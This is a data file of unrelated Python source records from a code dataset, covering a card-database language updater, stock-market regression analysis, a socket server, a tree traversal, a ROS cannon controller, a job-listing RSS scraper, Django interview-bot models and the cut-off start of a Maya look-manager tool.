sort_keys=True, indent=4, ensure_ascii=False)\n\n print(\"Sets:\")\n print(set(set_data))\n print()\n\n ###########################################################################\n # Fix up all the xx/sets_xx.json files\n # Place entries in alphabetical order\n # If entries don't exist:\n # If the default language, set from information in the \"sets_db.json\" file,\n # If not the default language, set based on information from the default language.\n ###########################################################################\n for lang in languages:\n lang_file = \"sets_\" + lang + \".json\"\n fname = os.path.join(args.card_db_dir, lang, lang_file)\n if os.path.isfile(fname):\n lang_set_data = get_json_data(fname)\n else:\n lang_set_data = {}\n\n for s in sorted(set_data):\n if s not in lang_set_data:\n lang_set_data[s] = {}\n if lang == LANGUAGE_DEFAULT:\n lang_set_data[s][\"set_name\"] = s.title()\n lang_set_data[s][\"text_icon\"] = set_data[s][\"text_icon\"]\n if \"short_name\" in set_data[s]:\n lang_set_data[s][\"short_name\"] = set_data[s][\"short_name\"]\n if \"set_text\" in set_data[s]:\n lang_set_data[s][\"set_text\"] = set_data[s][\"set_text\"]\n else:\n lang_set_data[s][\"set_name\"] = lang_default[s][\"set_name\"]\n lang_set_data[s][\"text_icon\"] = lang_default[s][\"text_icon\"]\n if \"short_name\" in lang_default[s]:\n lang_set_data[s][\"short_name\"] = lang_default[s][\"short_name\"]\n if \"set_text\" in lang_default[s]:\n lang_set_data[s][\"set_text\"] = lang_default[s][\"set_text\"]\n else:\n if lang != LANGUAGE_DEFAULT:\n for x in lang_default[s]:\n if x not in lang_set_data[s] and x != \"used\":\n lang_set_data[s][x] = lang_default[s][x]\n\n if lang == LANGUAGE_DEFAULT:\n lang_default = lang_set_data # Keep for later languages\n\n with io.open(\n os.path.join(args.output_dir, lang, lang_file), \"w\", encoding=\"utf-8\"\n ) as lang_out:\n json.dump(lang_set_data, lang_out, ensure_ascii=False, indent=4)\n\n ###########################################################################\n # bonuses_xx files\n ###########################################################################\n for lang in languages:\n # Special case for xx. Reseed from default language\n fromLanguage = lang\n if lang == LANGUAGE_XX:\n fromLanguage = LANGUAGE_DEFAULT\n\n copyfile(\n os.path.join(\n args.card_db_dir, fromLanguage, \"bonuses_\" + fromLanguage + \".json\"\n ),\n os.path.join(args.output_dir, lang, \"bonuses_\" + lang + \".json\"),\n )\n\n ###########################################################################\n # translation.txt\n ###########################################################################\n copyfile(\n os.path.join(args.card_db_dir, \"translation.md\"),\n os.path.join(args.output_dir, \"translation.md\"),\n )\n\n # Since xx is the starting point for new translations,\n # make sure xx has the latest copy of translation.txt\n copyfile(\n os.path.join(args.card_db_dir, LANGUAGE_XX, \"translation.txt\"),\n os.path.join(args.output_dir, LANGUAGE_XX, \"translation.txt\"),\n )\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--card_db_dir\",\n default=os.path.join(\n os.path.dirname(os.path.abspath(__file__)), \"..\", \"src\", \"domdiv\", \"card_db\"\n ),\n help=\"directory of card data\",\n )\n parser.add_argument(\n \"--output_dir\",\n default=os.path.join(\n os.path.dirname(os.path.abspath(__file__)), \".\", \"card_db\"\n ),\n help=\"directory for output data\",\n )\n args = parser.parse_args()\n main(args)\n","sub_path":"tools/update_language.py","file_name":"update_language.py","file_ext":"py","file_size_in_byte":17381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"285797341","text":"# -*- coding: utf-8 -*-\nfrom __future__ import division ###小数除法\nimport numpy as np\nfrom config import config\n\ndefault_encoding = \"utf-8\"\nimport pandas as pd\nimport os\nimport matplotlib.pyplot as plt\nimport statsmodels.formula.api as smf\nimport datetime\nfrom scipy.stats.mstats import winsorize\nfrom linearmodels.datasets import jobtraining\nfrom linearmodels import PanelOLS\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import classification_report, confusion_matrix\n\n\n#model = LogisticRegression(solver='liblinear', random_state=0).fit(x, y)\n\nfrom DataUtils import get_STK_MKTLink_StockInfo, get_year_QFII, get_MNMAPR_Accruals, get_industry_type, get_STK_HKEXtoSSE_Top10\n\nplt.rcParams['font.sans-serif'] = ['SimHei'] # 用来正常显示中文标签\nplt.rcParams['axes.unicode_minus'] = False # 用来正常显示负号\npd.set_option('display.max_columns', None)\npd.set_option('display.max_rows', None)\npd.set_option('display.width', 1000)\n\n\ndef __ols_effect__():\n \"\"\"\n 忽略此函数\n :return:\n \"\"\"\n reg1 = 'AIV_lead1~1+ hkex + after +hkex*after + bm +lev + size + cfo +inshold + + AnaAttention + year_return'\n ols = smf.ols(data=year_indicators, formula=reg1).fit()\n result = ols.summary()\n return result\n\n\ndef get_reslut_one():\n year_indicators = pd.read_csv(config['year_indicators'], dtype={'Stkcd': str, 'Trdyear': str})\n year_indicators['AIV_lead1'] = winsorize(year_indicators['AIV_lead1'], (0.01, 0.01))\n STK_MKTLink_StockInfo = get_STK_MKTLink_StockInfo()\n STK_MKTLink_StockInfo['Stkcd'] = STK_MKTLink_StockInfo['Stkcd'].astype(str)\n year_QFII = get_year_QFII()\n year_QFII['Stkcd'] = year_QFII['Stkcd'].astype(str)\n year_indicators = pd.merge(year_indicators, STK_MKTLink_StockInfo, on='Stkcd', how='left')\n year_indicators = year_indicators[year_indicators['WhetherAandH'] != 'Y']\n year_indicators = pd.merge(year_indicators, year_QFII, on=['Stkcd','Trdyear'], how='inner') #剔除境外投资者持股影响\n print(year_indicators)\n print(year_indicators.describe())\n reg1 = 'AIV_lead1~1+ hkex + after +hkex*after + bm +lev + size + cfo +inshold + AnaAttention + year_return'\n #reg1 = 'year_AIV~1+ hkex + after +hkex*after + bm +lev + size + cfo +inshold + AnaAttention + year_return'\n ols = smf.ols(data=year_indicators, formula=reg1).fit()\n return ols.summary()\n\ndef get_reslut_two():\n \"\"\"\n 香港资金参与程度分组\n :return:\n \"\"\"\n year_indicators = pd.read_csv(config['year_indicators'], dtype={'Stkcd': str, 'Trdyear': str})\n year_indicators['AIV_lead1'] = winsorize(year_indicators['AIV_lead1'], (0.01, 0.01))\n year_indicators['year_AIV'] = winsorize(year_indicators['year_AIV'], (0.01, 0.01))\n STK_HKEXtoSSE_Top10 = get_STK_HKEXtoSSE_Top10()\n year_indicators = pd.merge(year_indicators, STK_HKEXtoSSE_Top10, on='Stkcd', how='left')\n print(year_indicators)\n year_indicators = year_indicators.fillna({'top_ten': 'low'}) # 对top_ten列填充\n year_indicators_high = year_indicators[year_indicators['top_ten'] == 'high']\n year_indicators_low = year_indicators[year_indicators['top_ten'] == 'low']\n # print(year_indicators_high)\n # print(year_indicators_high.describe())\n # print(year_indicators_low)\n # print(year_indicators_low.describe())\n reg1 = 'AIV_lead1~1+ hkex + after +hkex*after + bm +lev + size + cfo +inshold + AnaAttention + year_return'\n #reg1 = 'year_AIV~1+ hkex + after +hkex*after + bm +lev + size + cfo +inshold + AnaAttention + year_return'\n ols_high = smf.ols(data=year_indicators_high, formula=reg1).fit()\n ols_low = smf.ols(data=year_indicators_low, formula=reg1).fit()\n return ols_high.summary(), ols_low.summary()\n\n\n\n\n\n\ndef get_dacc_sigma():\n MNMAPR_Accruals = get_MNMAPR_Accruals()\n industry_type = get_industry_type()\n dacc_sigma = pd.merge(MNMAPR_Accruals, industry_type, on='Stkcd', how='left')\n dacc_sigma = dacc_sigma.dropna()\n\n return dacc_sigma\n\n\ndef __alpha_betas__(rdata, regModel, NWlag=12):\n \"\"\"\n 忽略此文件\n :param rdata:\n :param regModel:\n :param NWlag:\n :return:\n \"\"\"\n ols = smf.ols(formula=regModel, data=rdata) \\\n .fit(cov_type='HAC', cov_kwds={'maxlags': NWlag, 'use_correction': True})\n params=ols.params\n t_stats=ols.tvalues\n p_values=ols.pvalues\n t_stats.index=t_stats.index.to_series().apply(lambda x:x+\"_t\").values\n p_values.index=p_values.index.to_series().apply(lambda x:x+\"_p\").values\n output=pd.concat([params, t_stats, p_values], axis=0)#数据合并\n output['Num.Obs.']=ols.nobs\n output['R-squared-adj']=ols.rsquared_adj\n output=pd.DataFrame(data=output.values.reshape([1,-1]),columns=output.index.to_series().values)\n output = output.apply(lambda x: __alpha_betas_significant__(x, params.index, p_values.index), axis=1)\n return output\n\n\n\n\nif __name__ == \"__main__\":\n pass\n # year_indicators = pd.read_csv(config['year_indicators'], dtype={'Stkcd': str, 'Trdyear': str})\n # year_indicators['AIV_lead1'] = winsorize(year_indicators['AIV_lead1'], (0.01, 0.01))\n # STK_MKTLink_StockInfo = get_STK_MKTLink_StockInfo()\n # STK_MKTLink_StockInfo['Stkcd'] = STK_MKTLink_StockInfo['Stkcd'].astype(str)\n # year_QFII = get_year_QFII()\n # year_QFII['Stkcd'] = year_QFII['Stkcd'].astype(str)\n # year_indicators = pd.merge(year_indicators, STK_MKTLink_StockInfo, on='Stkcd', how='left')\n # year_indicators = year_indicators[year_indicators['WhetherAandH'] != 'Y']\n # year_indicators = pd.merge(year_indicators, year_QFII, on=['Stkcd','Trdyear'], how='inner') #剔除境外投资者持股影响\n # print(year_indicators)\n # print(year_indicators.describe())\n # reg1 = 'AIV_lead1~1+ hkex + after +hkex*after + bm +lev + size + cfo +inshold + + AnaAttention + year_return'\n #reg1 = 'year_AIV~1+ hkex + after +hkex*after + bm +lev + size + cfo +inshold + + AnaAttention + year_return'\n # ols = smf.ols(data=year_indicators, formula=reg1).fit()\n # print(ols.summary())\n # print(year_indicators)\n # print(get_reslut_one())\n # print(get_dacc_sigma())\n #print(get_reslut_two())\n","sub_path":"table1_regession.py","file_name":"table1_regession.py","file_ext":"py","file_size_in_byte":6149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"150183545","text":"import sys\nimport threading\nimport tcpServer\nimport executer\nfrom multiprocessing import Queue\nfrom multiprocessing import Process\nimport time\nimport queue\n\nclass SocketServer:\n def __init__(self,port,timeQueue):\n # make public queue\n self.commandQueue = Queue()\n self.timeQueue = timeQueue\n self.port = port\n # init module\n self.andRaspTCP = tcpServer.TCPServer(self.commandQueue, \"\", port, self.timeQueue)\n \n \n \n # set module to executer\n self.commandExecuter = executer.Executer(self.andRaspTCP, self.timeQueue)\n \n def gettingMsg(self):\n if(self.port == 35357):\n print(\"[USER SERVER] Getting Thread is Executing..\")\n elif(self.port == 35358):\n print(\"[GUARDIAN SERVER] Getting Thread is Executing..\")\n while True:\n try:\n self.command = self.commandQueue.get()\n #self.timeQueue.put(self.command)\n self.commandExecuter.startCommand(self.command)\n except:\n pass\n def sendingMsg(self):\n if(self.port == 35357):\n print(\"[USER SERVER] Sending Thread is Executing..\")\n elif(self.port == 35358):\n print(\"[GUARDIAN SERVER] Sending Thread is Executing..\")\n while True:\n try:\n #sys.stdout.write(\">>\")\n data = input()\n data = data.encode(\"utf-8\") \n data = str(data).split(\"b'\",1)[1].rsplit(\"'\",1)[0]\n data = str(data)+ '\\n' \n andRaspTCP.sendAll(data)\n except EOFError:\n pass\n \n def run(self):\n self.andRaspTCP.start()\n proc_sending = Process(target=self.sendingMsg,args=())\n proc_getting = Process(target=self.gettingMsg,args=())\n proc_getting.start()\n proc_sending.start()\n \n \n\n","sub_path":"Server/main_user.py","file_name":"main_user.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"242419724","text":"\"\"\"\r\nGiven a binary tree, return the postorder traversal of its nodes’ values.\r\n\r\nExample :\r\n\r\nGiven binary tree\r\n\r\n 1\r\n \\\r\n 2\r\n /\r\n 3\r\nreturn [3,2,1].\r\n\r\nUsing recursion is not allowed.\r\n\"\"\"\r\n\r\ndef posrorder_traversal(root):\r\n if not root:\r\n return []\r\n\r\n stack1 = [root]\r\n results = []\r\n stack2 = []\r\n\r\n while len(stack1) > 0:\r\n current = stack1.pop()\r\n stack2.append(current.val)\r\n if current.left is not None:\r\n stack1.append(current.right)\r\n if current.right is not None:\r\n stack1.append(current.left)\r\n\r\n return stack2[::-1]\r\n","sub_path":"LeetCode/Microsoft/postorder_traversal.py","file_name":"postorder_traversal.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"124147396","text":"#!/usr/bin/env python\n\nimport rospy\nfrom std_msgs.msg import UInt16\n\nimport sys, select, termios, tty\n\ndef getKey():\n\ttty.setraw(sys.stdin.fileno())\n\tselect.select([sys.stdin], [], [], 0)\n\tkey = sys.stdin.read(1)\n\ttermios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)\n\treturn key\n\nif __name__==\"__main__\":\n\tsettings = termios.tcgetattr(sys.stdin)\n\n\tservo_pub = rospy.Publisher('servo', UInt16, queue_size = 1)\n\taccel_pub = rospy.Publisher('relay', UInt16, queue_size = 1)\n\n\trospy.init_node('cannon_controller')\n\n\taccel_on = False\n\n\ttry:\n\t\twhile not rospy.is_shutdown():\n\t\t\tkey = getKey()\n\t\t\tif key == ' ':\n\t\t\t\tprint(\"Fire!\")\n\t\t\t\tservo_pub.publish(80)\n\t\t\telif key == 'r':\n\t\t\t\taccel_on = not accel_on\n\t\t\t\tif accel_on:\n\t\t\t\t\tprint(\"Relay on\")\n\t\t\t\t\taccel_pub.publish(1)\n\t\t\t\telse:\n\t\t\t\t\tprint(\"Relay off\")\n\t\t\t\t\taccel_pub.publish(0)\n\t\t\telif key == 'e':\n\t\t\t\tprint(\"system down\")\n\t\t\t\tbreak\n\t\t\t\t\n\texcept Exception as e:\n\t\tprint(e)\n\n","sub_path":"Auto_Mode/catkin_ws/src/cannon_controller/scripts/keyboard_control.py","file_name":"keyboard_control.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"519104332","text":"import rsswriter\nimport time\nimport argparse\nimport bs4 as bs\nfrom urllib.parse import urljoin\nfrom selenium import webdriver\nfrom selenium.webdriver.firefox.options import Options\n\ndef open_browser(url):\n options = Options()\n options.add_argument('--headless')\n browser = webdriver.Firefox(firefox_options=options, executable_path=r'geckodriver')\n browser.get(url)\n time.sleep(3)\n return browser\n\ndef check_pagination(browser):\n try:\n browser.find_element_by_xpath('//*[@id=\"pagination-bottom\"]/div[3]/a')\n return True\n except:\n return False\n\ndef search_jobs(url, path):\n browser = open_browser(url)\n\n jobs_list = []\n\n if check_pagination(browser) == True:\n browser.find_element_by_xpath('//*[@id=\"pagination-bottom\"]/div[3]/a').click()\n time.sleep(3)\n\n soup = bs.BeautifulSoup(browser.page_source, 'lxml')\n browser.quit()\n jobs_section = soup.find('section', {'id': 'search-results-list'})\n jobs_soup = jobs_section.find_all('a')\n\n for job in jobs(jobs_soup, path):\n jobs_list.append(job)\n\n return jobs_list\n\ndef jobs(soup, path):\n for job in soup:\n if job.has_attr('data-job-id'):\n link = urljoin('%s' % path, job.get('href'))\n title = job.find('h2').text\n yield link, title\n\ndef main():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-url', required=True, help=\"tenethealth url\")\n parser.add_argument('-output', required=True, help=\"name of rss file ex: feed.xml\")\n parser.add_argument('-title', required=True, help=\"name in RSS feed tag\")\n parser.add_argument('-link', required=True, help=\"location in RSS feed <link> tag\")\n\n args = parser.parse_args()\n\n jobs = search_jobs(args.url, 'https://jobs.tenethealth.com/')\n rss_feed = rsswriter.format_rss(jobs, args.title, args.link)\n\n with open(args.output, 'w+') as f:\n f.write(rss_feed)\n\nif __name__ == '__main__':\n main()\n","sub_path":"desertcarenetwork-parser.py","file_name":"desertcarenetwork-parser.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"318680056","text":"import os\n\ndir_path = './assets/EMBO/'\n\n# list to store files\nres = []\n\n# Iterate directory\nfor path in os.listdir(dir_path):\n # check if current path is a file\n if os.path.isfile(os.path.join(dir_path, path)):\n res.append(path)\n\n\nwith open(\"out.txt\", \"w\") as f:\n for img in res:\n f.write(\"<img data-src=\\\"\"+dir_path[1:]+img+\"\\\" alt=\\\"\"+img[:-13]+\"\\\" class=\\\"lazyload act_image\\\" />\\n\")\n\n\n\n\n\n# \"<img src=\\\"\"+dir_path[1:]+img+\"\\\" alt=\\\"\"+img[:-4]+\"\\\" loading=\\\"lazy\\\">\"\n# \"\\t<div class=\\\"mySlides fade\\\">\\n\\t\\t<img src=\\\"\"+dir_path[1:]+img+\"\\\" alt=\\\"\"+img[:-4]+\">\\n\\t</div>\"\n","sub_path":"imagelist.py","file_name":"imagelist.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"424157045","text":"from django.db import models\nfrom django.contrib.auth.models import User\n# Create your models here.\n\nclass UserProfileInfo(models.Model):\n\n user=models.OneToOneField(User,on_delete=models.CASCADE)\n\n phone_number=models.IntegerField()\n\n date_of_birth=models.CharField(max_length=15)\n\n Address=models.CharField(max_length=200)\n\n school_10th=models.CharField(max_length=100)\n\n percentage_10th=models.IntegerField()\n\n school_12th=models.CharField(max_length=100)\n\n percentage_12th=models.IntegerField()\n Btech='B.tech'\n Bsc='B.sc'\n BCA='BCA'\n MCA='MCA'\n BBA='BBA'\n BE='B.E'\n NONE='None'\n CSE='Computer science'\n IT='Information technology'\n CE='Computer engineering'\n MATH='Mathematics'\n ML='Machine learning'\n ECE='Electronics and communication'\n\n grad_choices=((Btech,'B.tech'),(Bsc,'B.sc'),(BCA,'BCA'),(MCA,'MCA'),(BBA,'BBA'),(BE,'B.E'),(NONE,'None'))\n graduation=models.CharField(choices=grad_choices,max_length=7)\n\n branch_choices=((CSE,'Computer science'),(IT,'Information technology'),(CE,'Computer engineering'),(MATH,'Mathematics'),(ML,'Machine learning'),(ECE,'Electronics and communication'),(NONE,'None'))\n branch_graduation=models.CharField(choices=branch_choices,max_length=30)\n Cplusplus='C++'\n C='C'\n JAVA='JAVA'\n Csharp='C#'\n NET='.NET'\n PYTHON='PYTHON'\n JS='JavaScript'\n HTML='HTML'\n CSS='CSS'\n DBMS='Database'\n NETWORK='Networking'\n CLOUD='Cloud'\n AND='Android'\n AI='AI'\n DATASCIENCE='Data science'\n\n technical_choices=((Cplusplus,'C++'),(C,'C'),(JAVA,'JAVA'),(Csharp,'C#'),(NET,'.NET'),(PYTHON,'PYTHON'),(JS,'JavaScript'),(HTML,'HTML'),(CSS,'CSS'),(DBMS,'Database'),(NETWORK,'Networking'),(CLOUD,'Cloud'),(AND,'Android'),(ML,'ML'),(AI,'AI'),(DATASCIENCE,'Data science'))\n\n technical_skills_and_language=models.CharField(choices=technical_choices,max_length=15)\n\n Other_skills=models.CharField(choices=technical_choices,blank=True,max_length=15)\n Reading_books='Reading books'\n reading_novels='reading novels'\n Cooking='Cooking'\n Movies='Watching Movies'\n Badminton='Playing Badminton'\n Cricket='Playing Cricket'\n Football='Playing football'\n basketball='Playing basketball'\n Chess='Playing Chess'\n GYM='Going Gym'\n Music='listening Music'\n Dance='Dancing'\n\n hob_choices=((Reading_books,'Reading books'),(reading_novels,'reading novels'),(Cooking,'Cooking'),(Movies,'Watching Movies'),(Badminton,'Playing Badminton'),(Cricket,'Playing Cricket'),(Football,'Playing football'),(basketball,'Playing basketball'),(Chess,'Playing Chess'),(GYM,'Going Gym'),(Music,'listening Music'),(Dance,'Dancing'))\n Main_Hobbies=models.CharField(choices=hob_choices,max_length=25)\n\n Other_Hobbies=models.CharField(choices=hob_choices ,blank=True,max_length=25)\n\n achievement=models.CharField(max_length=100,blank=True)\n\n Project_Done=models.CharField(max_length=100,blank=True)\n\n profile_picture=models.ImageField(upload_to='profile_pics',blank=True)\n\n def __str__(self):\n return self.user.username\nclass questions(models.Model):\n Reading_books='Reading books'\n reading_novels='reading novels'\n Cooking='Cooking'\n Movies='Watching Movies'\n Badminton='Playing Badminton'\n Cricket='Playing Cricket'\n Football='Playing football'\n basketball='Playing basketball'\n Chess='Playing Chess'\n GYM='Going Gym'\n Music='listening Music'\n Dance='Dancing'\n Cplusplus='C++'\n C='C'\n JAVA='JAVA'\n Csharp='C#'\n NET='.NET'\n PYTHON='PYTHON'\n JS='JavaScript'\n HTML='HTML'\n CSS='CSS'\n DBMS='Database'\n NETWORK='Networking'\n CLOUD='Cloud'\n AND='Android'\n AI='AI'\n DATASCIENCE='Data science'\n ML='Machine learning'\n\n HR='HR'\n TECHNICAL='TECHNICAL'\n QUESTION_TYPE=((HR,'HR'),(TECHNICAL,'TECHNICAL'))\n Question_Type=models.CharField(choices=QUESTION_TYPE,max_length=10)\n GK='GK'\n Concept=\"Concept\"\n cat_choice=((Concept,\"Concept\"),(HR,'HR'),(TECHNICAL,'TECHNICAL'),(GK,'GK'),(Reading_books,'Reading books'),(reading_novels,'reading novels'),(Cooking,'Cooking'),(Movies,'Watching Movies'),(Badminton,'Playing Badminton'),(Cricket,'Playing Cricket'),(Football,'Playing football'),(basketball,'Playing basketball'),(Chess,'Playing Chess'),(GYM,'Going Gym'),(Music,'listening Music'),(Dance,'Dancing'),(Cplusplus,'C++'),(C,'C'),(JAVA,'JAVA'),(Csharp,'C#'),(NET,'.NET'),(PYTHON,'PYTHON'),(JS,'JavaScript'),(HTML,'HTML'),(CSS,'CSS'),(DBMS,'Database'),(NETWORK,'Networking'),(CLOUD,'Cloud'),(AND,'Android'),(ML,'ML'),(AI,'AI'),(DATASCIENCE,'Data science'))\n Category=models.CharField(choices=cat_choice,max_length=50)\n Difficulty_level=models.PositiveSmallIntegerField()\n Question=models.CharField(max_length=256)\n Answer=models.CharField(max_length=512)\n\n def __str__(self):\n return self.Question\nclass result_user(models.Model):\n user_result=models.OneToOneField(User,on_delete=models.CASCADE)\n marks=models.CharField(max_length=2048)\n date_of_exam= models.DateTimeField(auto_now_add=True)\n quest_list=models.CharField(max_length=2048,default=\"\")\n exam_name=models.CharField(max_length=256)\n def __str__(self):\n return self.user_result.username\nclass company_post(models.Model):\n Company_name=models.CharField(max_length=256)\n Position=models.CharField(max_length=256)\n Difficulty_level=models.PositiveIntegerField()\n salary_in_rupees=models.PositiveIntegerField()\n min_experience_in_years=models.PositiveIntegerField()\n Discreption=models.CharField(max_length=512)\n def __str__(self):\n return self.Company_name\nclass company_marks(models.Model):\n user_name=models.ForeignKey(result_user,on_delete=models.CASCADE)\n Company_name=models.ForeignKey(company_post,on_delete=models.CASCADE)\n cm_marks=models.PositiveSmallIntegerField()\n cm_position=models.CharField(max_length=256)\n def __str__(self):\n return self.user_name.user_result.username\n","sub_path":"InterviewBot/Front/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"302315088","text":"import json\nimport sys\nimport logging\n\nfrom avalon.tools import lib as tools_lib\nfrom avalon.vendor.Qt import QtWidgets, QtCore, QtGui\n\nfrom . import commands, models, views\n\nmodule = sys.modules[__name__]\nmodule.window = None\n\n# Todo: implement load_queue logic and link store_queue to button\n\n\nclass App(QtWidgets.QWidget):\n\n def __init__(self, parent=None):\n QtWidgets.QWidget.__init__(self, parent=parent)\n\n self._noderole = QtCore.Qt.UserRole + 1\n\n self.log = logging.getLogger(__name__)\n\n self.setObjectName(\"lookManager\")\n self.setWindowTitle(\"Look Manager 1.1\")\n self.resize(900, 530)\n\n self.apply_button = None\n self.refresh_button = None\n self.random_button = None\n self.list_view = None\n\n self.setup_ui()\n\n self.setup_connections()\n\n self.refresh()\n\n def refresh(self):\n \"\"\"Refresh the content\"\"\"\n\n # Get all containers and information\n items = commands.get_selected_assets()\n self.container_model.clear()\n if items:\n # Add all found containers to the models for display\n self.container_model.add_items(items)\n\n def setup_ui(self):\n \"\"\"Build the UI\"\"\"\n\n main_layout = QtWidgets.QHBoxLayout()\n splitter = QtWidgets.QSplitter()\n\n # Container overview\n container_widget = QtWidgets.QWidget()\n container_title = self._create_label(\"Assets\")\n container_layout = QtWidgets.QVBoxLayout()\n\n container_model = models.ContainerModel()\n container_view = views.View()\n container_view.setModel(container_model)\n container_view.setContextMenuPolicy(QtCore.Qt.NoContextMenu)\n\n from_selection_btn = QtWidgets.QPushButton(\"Get Looks From Selection\")\n from_all_asset_btn = QtWidgets.QPushButton(\"Get Looks From All Assets\")\n\n container_layout.addWidget(container_title)\n container_layout.addWidget(from_selection_btn)\n container_layout.addWidget(from_all_asset_btn)\n container_layout.addWidget(container_view)\n\n # Add container view\n container_widget.setLayout(container_layout)\n splitter.addWidget(container_widget)\n\n # look manager layout\n look_views_widget = QtWidgets.QWidget()\n look_views_layout = QtWidgets.QVBoxLayout()\n look_views_layout.setSpacing(10)\n\n # Looks from database\n documents_title = self._create_label(\"Available looks\")\n documents_title.setAlignment(QtCore.Qt.AlignCenter)\n document_model = models.FlatModel()\n document_view = views.View()\n document_view.setToolTip(\"Use right mouse button menu for direct actions\")\n document_view.setModel(document_model)\n document_view.setMinimumHeight(230)\n\n look_views_layout.addWidget(documents_title)\n look_views_layout.addWidget(document_view)\n\n # Turn off queue at start, show this widget\n queue_off_message = QtWidgets.QLabel(\n \"Queue is empty, add items to the queue to active it\")\n queue_off_message.setAlignment(QtCore.Qt.AlignCenter)\n queue_off_message.setStyleSheet(\"font-size: 12px;\")\n\n # Queue view\n queue_title = self._create_label(\"Queue\")\n queue_title.setAlignment(QtCore.Qt.AlignCenter)\n queue_model = models.LookQueueModel()\n queue_view = views.View()\n queue_view.setModel(queue_model)\n\n queue_widgets = QtWidgets.QStackedWidget()\n queue_widgets.addWidget(queue_off_message)\n queue_widgets.addWidget(queue_view)\n\n look_views_layout.addWidget(queue_title)\n look_views_layout.addWidget(queue_widgets)\n\n # Method buttons\n method_buttons_layout = QtWidgets.QHBoxLayout()\n assign_to_selected_btn = QtWidgets.QPushButton(\"Process Selected Queue\")\n assign_to_all_btn = QtWidgets.QPushButton(\"Process Queued Looks\")\n remove_unused_btn = QtWidgets.QPushButton(\"Remove Unused Looks\")\n method_buttons_layout.addWidget(assign_to_selected_btn)\n method_buttons_layout.addWidget(assign_to_all_btn)\n method_buttons_layout.addWidget(remove_unused_btn)\n\n load_save_buttons_layout = QtWidgets.QHBoxLayout()\n load_queue_btn = QtWidgets.QPushButton(\"Load Queue from File\")\n save_queue_btn = QtWidgets.QPushButton(\"Save Queue to File\")\n load_save_buttons_layout.addWidget(load_queue_btn)\n load_save_buttons_layout.addWidget(save_queue_btn)\n\n look_views_layout.addLayout(method_buttons_layout)\n look_views_layout.addLayout(load_save_buttons_layout)\n look_views_widget.setLayout(look_views_layout)\n splitter.addWidget(look_views_widget)\n\n main_layout.addWidget(splitter)\n\n container_view.setColumnWidth(0, 200) # subset\n document_view.setColumnWidth(0, 200)\n queue_view.setColumnWidth(0, 200)\n\n self.from_selection_btn = from_selection_btn\n self.from_all_asset_btn = from_all_asset_btn\n\n self.assign_to_selected_btn = assign_to_selected_btn\n self.assign_to_all_btn = assign_to_all_btn\n self.remove_unused_btn = remove_unused_btn\n\n self.container_model = container_model\n self.container_view = container_view\n\n self.document_model = document_model\n self.document_view = document_view\n\n self.queue_widgets = queue_widgets\n self.queue_model = queue_model\n self.queue_view = queue_view\n\n self.save_queue = save_queue_btn\n self.load_queue = load_queue_btn\n\n self.setLayout(main_layout)\n\n def setup_connections(self):\n \"\"\"Connect interactive widgets with actions\"\"\"\n\n container_selection_model = self.container_view.selectionModel()\n container_selection_model.selectionChanged.connect(\n self._on_container_selection_changed)\n\n # Buttons\n self.from_selection_btn.clicked.connect(self.refresh)\n self.from_all_asset_btn.clicked.connect(self._get_all_assets)\n self.assign_to_all_btn.clicked.connect(self._apply_from_queue)\n self.assign_to_selected_btn.clicked.connect(self._apply_from_selection)\n self.remove_unused_btn.clicked.connect(commands.remove_unused_looks)\n\n self.save_queue.clicked.connect(self._on_save_queue)\n self.load_queue.clicked.connect(self._on_load_queue)\n\n # Set menu triggers\n self.document_view.customContextMenuRequested.connect(\n self.build_document_menu)\n\n self.queue_view.customContextMenuRequested.connect(\n self.build_queue_menu)\n\n def build_document_menu(self, pos):\n \"\"\"Build RMB menu for document view\"\"\"\n\n active = self.document_view.currentIndex() # index under mouse\n active = active.sibling(active.row(), 0) # get first column\n globalpos = self.document_view.viewport().mapToGlobal(pos)\n\n if not active.isValid():\n return\n\n menu = QtWidgets.QMenu(self.document_view)\n\n # Direct assignment\n apply_action = QtWidgets.QAction(menu, text=\"Assign Directly\")\n apply_action.triggered.connect(self._apply_from_selection)\n\n queue_action = QtWidgets.QAction(menu, text=\"Queue Assignment\")\n queue_action.triggered.connect(self._add_queue_items)\n\n menu.addAction(apply_action)\n menu.addAction(queue_action)\n\n menu.exec_(globalpos)\n\n def build_queue_menu(self, pos):\n\n active = self.queue_view.currentIndex() # index under mouse\n active = active.sibling(active.row(), 0) # get first column\n globalpos = self.queue_view.viewport().mapToGlobal(pos)\n\n menu = QtWidgets.QMenu(self.document_view)\n\n if active.isValid():\n apply_action = QtWidgets.QAction(menu, text=\"Apply looks\")\n apply_action.triggered.connect(self._apply_from_queue)\n\n rem_action = QtWidgets.QAction(menu, text=\"Remove Selected Queue\")\n rem_action.triggered.connect(self._remove_selected_queued)\n\n menu.addAction(apply_action)\n menu.addAction(rem_action)\n menu.addSeparator()\n\n save_action = QtWidgets.QAction(menu, text=\"Save Queue\")\n save_action.triggered.connect(self._on_save_queue)\n\n clear_action = QtWidgets.QAction(menu, text=\"Clear Queue\")\n clear_action.triggered.connect(self._clear_queue)\n\n menu.addAction(save_action)\n menu.addAction(clear_action)\n\n menu.exec_(globalpos)\n\n def _on_save_queue(self):\n \"\"\"Store the created queue in a json file\"\"\"\n\n _dir = commands.get_workfolder()\n fdialog = QtWidgets.QFileDialog()\n filepath, ext = fdialog.getSaveFileName(self,\n \"Save 